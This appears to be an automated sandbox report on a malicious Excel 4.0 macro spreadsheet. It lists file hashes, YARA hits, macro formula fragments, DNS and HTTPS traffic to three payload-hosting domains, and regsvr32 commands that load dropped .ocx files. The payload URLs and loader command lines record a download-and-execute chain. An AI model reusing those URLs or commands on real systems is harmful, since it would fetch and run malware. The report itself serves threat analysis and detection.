                                   7dcce5b76c8b17472d024758970a406b | INVOICE - FIRST 2 CONTAINERS 1110.docx | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | PO 16860.ppam | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docx | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | Clti.xlsx | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | Vernon.xlsx | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Temp\91C4.tmp
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Cannot read section info
                                  Category:dropped
                                  Size (bytes):1536
                                  Entropy (8bit):1.1464700112623651
                                  Encrypted:false
                                  SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                  MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                  SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                  SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                  SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\AppData\Local\Temp\~DF22AC4F44EF579D15.TMP
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):28672
                                  Entropy (8bit):3.309727213192086
                                  Encrypted:false
                                  SSDEEP:768:5kmKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgAWuImuZA:5TKpb8rGYrMPe3q7Q0XV5xtezEsi8/d1
                                  MD5:321156BB89EBDBE9CAEC80FB2A150C47
                                  SHA1:075C7AF142F023726A0A6246AF33B934C30DB540
                                  SHA-256:CB714098CBB73CAB579390D9EF687D1B260B30A6303C4BAFB77D8DBCB0E8BC4E
                                  SHA-512:CA544DDA2062EFB3FE75D55EF85288C989F323BC2935C2574EE3C0CD0C6F10045334A71A99FB723E62949B15B95FDDCA041DC025745C0A13111A5D93DF8620D0
                                  Malicious:false
                                  Reputation:low
                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\AppData\Local\Temp\~DF8E36D078DBA15E72.TMP
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3::
                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\Desktop\survey-1384723731.xls
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Thu Nov 25 10:07:14 2021, Security: 0
                                  Category:dropped
                                  Size (bytes):252928
                                  Entropy (8bit):7.2414057109948615
                                  Encrypted:false
                                  SSDEEP:6144:MKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgBcfFw6lxFT7kFWqOSMQ6HujLmH98DUa:kFrlxFTMrvbiFd8Dn
                                  MD5:55BA35D7D7C154E827124940F26178C7
                                  SHA1:F51E37DE42F739CCC17E39AD40D121FB1F1E7F88
                                  SHA-256:37153AA205D42CA882086A9594827B89F8AF82E39A094CE568568AB1E4195ED0
                                  SHA-512:BAAAA933DBC8C40567067B95A75B8980AFFB809F50238A8A9BC48F7E5F2670C77D1C041FBE462147069CB57188015F3CF3ACB9358DA71FE1C0968C6C497108C5
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\survey-1384723731.xls, Author: John Lambert @JohnLaTwC
                                  • Rule: JoeSecurity_HiddenMacro, Description: Yara detected hidden Macro 4.0 in Excel, Source: C:\Users\user\Desktop\survey-1384723731.xls, Author: Joe Security
                                  Reputation:low
                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user.8.=. B.....a.........=...................................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.

                                  Static File Info

                                  General

                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Thu Nov 25 10:07:14 2021, Security: 0
                                  Entropy (8bit):7.241391186014771
                                  TrID:
                                  • Microsoft Excel sheet (30009/1) 78.94%
                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                  File name:survey-1384723731.xls
                                  File size:252928
                                  MD5:00bec62d14bc9f8a32948f2c6c512a8f
                                  SHA1:d2ef80f029f8f035947f1bc6f5929d225374dda4
                                  SHA256:59d14a53849a19d0dd5ccaf63a85955adbd313c9ec7d92422c0fcdda357b8ce0
                                  SHA512:34b785ff2f6b964c1285db744a04c62d2b2ef522ced03d0f4896e1a4cc7adf8384167c733b9f2d94ed43bdf6f50ed290e0fe73b7c0942b375d2246a3f65f93dd
                                  SSDEEP:6144:MKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgBcfFw6lxFT7kFWqOSMQ6HujLmH98DUC:kFrlxFTMrvbiFd8Dr
                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                  File Icon

                                  Icon Hash:e4eea286a4b4bcb4

                                  Static OLE Info

                                  General

                                  Document Type:OLE
                                  Number of OLE Files:1

                                  OLE File "survey-1384723731.xls"

                                  Indicators

                                  Has Summary Info:True
                                  Application Name:Microsoft Excel
                                  Encrypted Document:False
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:True
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:
                                  Flash Objects Count:
                                  Contains VBA Macros:True

                                  Summary

                                  Code Page:1251
                                  Author:
                                  Last Saved By:
                                  Create Time:2015-06-05 18:19:34
                                  Last Saved Time:2021-11-25 10:07:14
                                  Creating Application:Microsoft Excel
                                  Security:0

                                  Document Summary

                                  Document Code Page:1251
                                  Thumbnail Scaling Desired:False
                                  Company:
                                  Contains Dirty Links:False
                                  Shared Document:False
                                  Changed Hyperlinks:False
                                  Application Version:1048576

                                  Streams

                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                  General
                                  Stream Path:\x5DocumentSummaryInformation
                                  File Type:data
                                  Stream Size:4096
                                  Entropy:0.490967081883
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . \\ . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S i m b 1 . . . . . S h e e t . . . . . S b u r r 8 . . . . . S b u u r 2 . . . . . R g e d w g . . . . . E O R
                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 5c 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 1a 01 00 00
                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                  General
                                  Stream Path:\x5SummaryInformation
                                  File Type:data
                                  Stream Size:4096
                                  Entropy:0.27571260507
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 241509
                                  General
                                  Stream Path:Workbook
                                  File Type:Applesoft BASIC program data, first line number 16
                                  Stream Size:241509
                                  Entropy:7.42266783191
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . .
                                  Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 01 10 04 34 04 3c 04 38 04 3d 04 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                  Macro 4.0 Code

                                   12,2,=CHAR(Simb1!D25)
                                   6,7,=CHAR(Simb1!J25)
                                   10,5,=CHAR(Simb1!R27)
                                   6,3,=CHAR(Simb1!S32)
                                   11,2,=CHAR(Simb1!E31)
                                   4,5,=CHAR(Simb1!G26)

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Nov 25, 2021 14:31:11.378211975 CET | 49167 | 443 | 192.168.2.22 | 192.185.79.2
                                   Nov 25, 2021 14:31:11.378351927 CET | 443 | 49167 | 192.185.79.2 | 192.168.2.22
                                   Nov 25, 2021 14:31:11.378447056 CET | 49167 | 443 | 192.168.2.22 | 192.185.79.2
                                   Nov 25, 2021 14:31:11.389520884 CET | 49167 | 443 | 192.168.2.22 | 192.185.79.2
                                   Nov 25, 2021 14:31:11.389555931 CET | 443 | 49167 | 192.185.79.2 | 192.168.2.22
                                   Nov 25, 2021 14:31:11.683248043 CET | 443 | 49167 | 192.185.79.2 | 192.168.2.22
                                   Nov 25, 2021 14:31:11.683455944 CET | 49167 | 443 | 192.168.2.22 | 192.185.79.2
                                   Nov 25, 2021 14:31:11.696111917 CET | 49167 | 443 | 192.168.2.22 | 192.185.79.2
                                   Nov 25, 2021 14:31:11.696131945 CET | 443 | 49167 | 192.185.79.2 | 192.168.2.22
                                   Nov 25, 2021 14:31:11.696595907 CET | 443 | 49167 | 192.185.79.2 | 192.168.2.22
                                   Nov 25, 2021 14:31:11.696711063 CET | 49167 | 443 | 192.168.2.22 | 192.185.79.2
                                   Nov 25, 2021 14:31:11.963294983 CET | 49167 | 443 | 192.168.2.22 | 192.185.79.2
                                   Nov 25, 2021 14:31:12.008872986 CET | 443 | 49167 | 192.185.79.2 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.222843885 CET | 443 | 49167 | 192.185.79.2 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.222930908 CET | 443 | 49167 | 192.185.79.2 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.223076105 CET | 49167 | 443 | 192.168.2.22 | 192.185.79.2
                                   Nov 25, 2021 14:31:13.224756956 CET | 49167 | 443 | 192.168.2.22 | 192.185.79.2
                                   Nov 25, 2021 14:31:13.224780083 CET | 443 | 49167 | 192.185.79.2 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.224837065 CET | 49167 | 443 | 192.168.2.22 | 192.185.79.2
                                   Nov 25, 2021 14:31:13.224843025 CET | 49167 | 443 | 192.168.2.22 | 192.185.79.2
                                   Nov 25, 2021 14:31:13.267674923 CET | 49168 | 443 | 192.168.2.22 | 192.185.129.7
                                   Nov 25, 2021 14:31:13.267739058 CET | 443 | 49168 | 192.185.129.7 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.267846107 CET | 49168 | 443 | 192.168.2.22 | 192.185.129.7
                                   Nov 25, 2021 14:31:13.268389940 CET | 49168 | 443 | 192.168.2.22 | 192.185.129.7
                                   Nov 25, 2021 14:31:13.268419027 CET | 443 | 49168 | 192.185.129.7 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.563096046 CET | 443 | 49168 | 192.185.129.7 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.563231945 CET | 49168 | 443 | 192.168.2.22 | 192.185.129.7
                                   Nov 25, 2021 14:31:13.579117060 CET | 49168 | 443 | 192.168.2.22 | 192.185.129.7
                                   Nov 25, 2021 14:31:13.579133987 CET | 443 | 49168 | 192.185.129.7 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.579469919 CET | 443 | 49168 | 192.185.129.7 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.579586983 CET | 49168 | 443 | 192.168.2.22 | 192.185.129.7
                                   Nov 25, 2021 14:31:13.594192982 CET | 49168 | 443 | 192.168.2.22 | 192.185.129.7
                                   Nov 25, 2021 14:31:13.636871099 CET | 443 | 49168 | 192.185.129.7 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.884943962 CET | 443 | 49168 | 192.185.129.7 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.885096073 CET | 443 | 49168 | 192.185.129.7 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.885128975 CET | 49168 | 443 | 192.168.2.22 | 192.185.129.7
                                   Nov 25, 2021 14:31:13.885174990 CET | 49168 | 443 | 192.168.2.22 | 192.185.129.7
                                   Nov 25, 2021 14:31:13.885288000 CET | 49168 | 443 | 192.168.2.22 | 192.185.129.7
                                   Nov 25, 2021 14:31:13.885303974 CET | 443 | 49168 | 192.185.129.7 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.885328054 CET | 49168 | 443 | 192.168.2.22 | 192.185.129.7
                                   Nov 25, 2021 14:31:13.885384083 CET | 49168 | 443 | 192.168.2.22 | 192.185.129.7
                                   Nov 25, 2021 14:31:13.947026968 CET | 49169 | 443 | 192.168.2.22 | 103.247.11.218
                                   Nov 25, 2021 14:31:13.947058916 CET | 443 | 49169 | 103.247.11.218 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.947134018 CET | 49169 | 443 | 192.168.2.22 | 103.247.11.218
                                   Nov 25, 2021 14:31:13.947638988 CET | 49169 | 443 | 192.168.2.22 | 103.247.11.218
                                   Nov 25, 2021 14:31:13.947660923 CET | 443 | 49169 | 103.247.11.218 | 192.168.2.22
                                   Nov 25, 2021 14:31:14.514420986 CET | 443 | 49169 | 103.247.11.218 | 192.168.2.22
                                   Nov 25, 2021 14:31:14.514731884 CET | 49169 | 443 | 192.168.2.22 | 103.247.11.218
                                   Nov 25, 2021 14:31:14.532887936 CET | 49169 | 443 | 192.168.2.22 | 103.247.11.218
                                   Nov 25, 2021 14:31:14.532915115 CET | 443 | 49169 | 103.247.11.218 | 192.168.2.22
                                   Nov 25, 2021 14:31:14.533230066 CET | 443 | 49169 | 103.247.11.218 | 192.168.2.22
                                   Nov 25, 2021 14:31:14.533324957 CET | 49169 | 443 | 192.168.2.22 | 103.247.11.218
                                   Nov 25, 2021 14:31:14.540359974 CET | 49169 | 443 | 192.168.2.22 | 103.247.11.218
                                   Nov 25, 2021 14:31:14.580926895 CET | 443 | 49169 | 103.247.11.218 | 192.168.2.22
                                   Nov 25, 2021 14:31:16.680984974 CET | 443 | 49169 | 103.247.11.218 | 192.168.2.22
                                  Nov 25, 2021 14:31:16.681061983 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:16.681067944 CET44349169103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:31:16.681123018 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:16.681343079 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:16.681368113 CET44349169103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:31:16.681402922 CET49169443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:31:16.681425095 CET49169443192.168.2.22103.247.11.218

                                   UDP Packets

                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Nov 25, 2021 14:31:11.207514048 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                   Nov 25, 2021 14:31:11.358360052 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.249545097 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                                   Nov 25, 2021 14:31:13.265183926 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
                                   Nov 25, 2021 14:31:13.907097101 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
                                   Nov 25, 2021 14:31:13.944614887 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22

                                   DNS Queries

                                   Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                   Nov 25, 2021 14:31:11.207514048 CET | 192.168.2.22 | 8.8.8.8 | 0xa382 | Standard query (0) | klevvrtech.com | A (IP address) | IN (0x0001)
                                   Nov 25, 2021 14:31:13.249545097 CET | 192.168.2.22 | 8.8.8.8 | 0xbd91 | Standard query (0) | srkcampus.org | A (IP address) | IN (0x0001)
                                   Nov 25, 2021 14:31:13.907097101 CET | 192.168.2.22 | 8.8.8.8 | 0xc498 | Standard query (0) | rstebet.co.id | A (IP address) | IN (0x0001)

                                   DNS Answers

                                   Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                   Nov 25, 2021 14:31:11.358360052 CET | 8.8.8.8 | 192.168.2.22 | 0xa382 | No error (0) | klevvrtech.com |  | 192.185.79.2 | A (IP address) | IN (0x0001)
                                   Nov 25, 2021 14:31:13.265183926 CET | 8.8.8.8 | 192.168.2.22 | 0xbd91 | No error (0) | srkcampus.org |  | 192.185.129.7 | A (IP address) | IN (0x0001)
                                   Nov 25, 2021 14:31:13.944614887 CET | 8.8.8.8 | 192.168.2.22 | 0xc498 | No error (0) | rstebet.co.id |  | 103.247.11.218 | A (IP address) | IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • klevvrtech.com
                                  • srkcampus.org
                                  • rstebet.co.id

                                   HTTPS Proxied Packets

                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                   0 | 192.168.2.22 | 49167 | 192.185.79.2 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                                   Timestamp | kBytes transferred | Direction | Data
                                   2021-11-25 13:31:11 UTC | 0 | OUT |
                                   GET /zxywJAC24KJ/ji.html HTTP/1.1
                                   Accept: */*
                                   UA-CPU: AMD64
                                   Accept-Encoding: gzip, deflate
                                   User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                   Host: klevvrtech.com
                                   Connection: Keep-Alive
                                   2021-11-25 13:31:13 UTC | 0 | IN |
                                   HTTP/1.1 200 OK
                                   Date: Thu, 25 Nov 2021 13:31:12 GMT
                                   Server: Apache
                                   Upgrade: h2,h2c
                                   Connection: Upgrade, close
                                   Accept-Ranges: none
                                   Content-Length: 0
                                   Content-Type: text/html; charset=UTF-8


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                   1 | 192.168.2.22 | 49168 | 192.185.129.7 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                                   Timestamp | kBytes transferred | Direction | Data
                                   2021-11-25 13:31:13 UTC | 0 | OUT |
                                   GET /OYcMRJbL/ji.html HTTP/1.1
                                   Accept: */*
                                   UA-CPU: AMD64
                                   Accept-Encoding: gzip, deflate
                                   User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                   Host: srkcampus.org
                                   Connection: Keep-Alive
                                   2021-11-25 13:31:13 UTC | 0 | IN |
                                   HTTP/1.1 200 OK
                                   Date: Thu, 25 Nov 2021 13:31:13 GMT
                                   Server: nginx/1.19.10
                                   Content-Type: text/html; charset=UTF-8
                                   X-Server-Cache: true
                                   X-Proxy-Cache: HIT
                                   Accept-Ranges: none
                                   Content-Length: 0
                                   Connection: close


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                   2 | 192.168.2.22 | 49169 | 103.247.11.218 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                                   Timestamp | kBytes transferred | Direction | Data
                                   2021-11-25 13:31:14 UTC | 1 | OUT |
                                   GET /fbmKk6n48G/ji.html HTTP/1.1
                                   Accept: */*
                                   UA-CPU: AMD64
                                   Accept-Encoding: gzip, deflate
                                   User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                   Host: rstebet.co.id
                                   Connection: Keep-Alive
                                   2021-11-25 13:31:16 UTC | 1 | IN |
                                   HTTP/1.1 200 OK
                                   Connection: close
                                   Content-Type: text/html; charset=UTF-8
                                   Content-Length: 0
                                   Date: Thu, 25 Nov 2021 13:31:16 GMT
                                   Server: LiteSpeed
                                   Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000


                                  Code Manipulations

                                  Statistics

                                  CPU Usage

                                  Memory Usage

                                  High Level Behavior Distribution

                                  Behavior

                                  System Behavior

                                  General

                                   Start time: 14:30:19
                                   Start date: 25/11/2021
                                   Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                   Wow64 process (32bit): false
                                   Commandline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                   Imagebase: 0x13f070000
                                   File size: 28253536 bytes
                                   MD5 hash: D53B85E21886D2AF9815C377537BCAC3
                                   Has elevated privileges: true
                                   Has administrator privileges: true
                                   Programmed in: C, C++ or other language
                                   Reputation: high

                                  General

                                   Start time: 14:30:30
                                   Start date: 25/11/2021
                                   Path: C:\Windows\System32\regsvr32.exe
                                   Wow64 process (32bit): false
                                   Commandline: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
                                   Imagebase: 0xff7e0000
                                   File size: 19456 bytes
                                   MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
                                   Has elevated privileges: true
                                   Has administrator privileges: true
                                   Programmed in: C, C++ or other language
                                   Reputation: high

                                  General

                                   Start time: 14:30:31
                                   Start date: 25/11/2021
                                   Path: C:\Windows\System32\regsvr32.exe
                                   Wow64 process (32bit): false
                                   Commandline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
                                   Imagebase: 0xff7e0000
                                   File size: 19456 bytes
                                   MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
                                   Has elevated privileges: true
                                   Has administrator privileges: true
                                   Programmed in: C, C++ or other language
                                   Reputation: high

                                  General

                                   Start time: 14:30:31
                                   Start date: 25/11/2021
                                   Path: C:\Windows\System32\regsvr32.exe
                                   Wow64 process (32bit): false
                                   Commandline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
                                   Imagebase: 0xff7e0000
                                   File size: 19456 bytes
                                   MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
                                   Has elevated privileges: true
                                   Has administrator privileges: true
                                   Programmed in: C, C++ or other language
                                   Reputation: high

                                  Disassembly

                                  Code Analysis
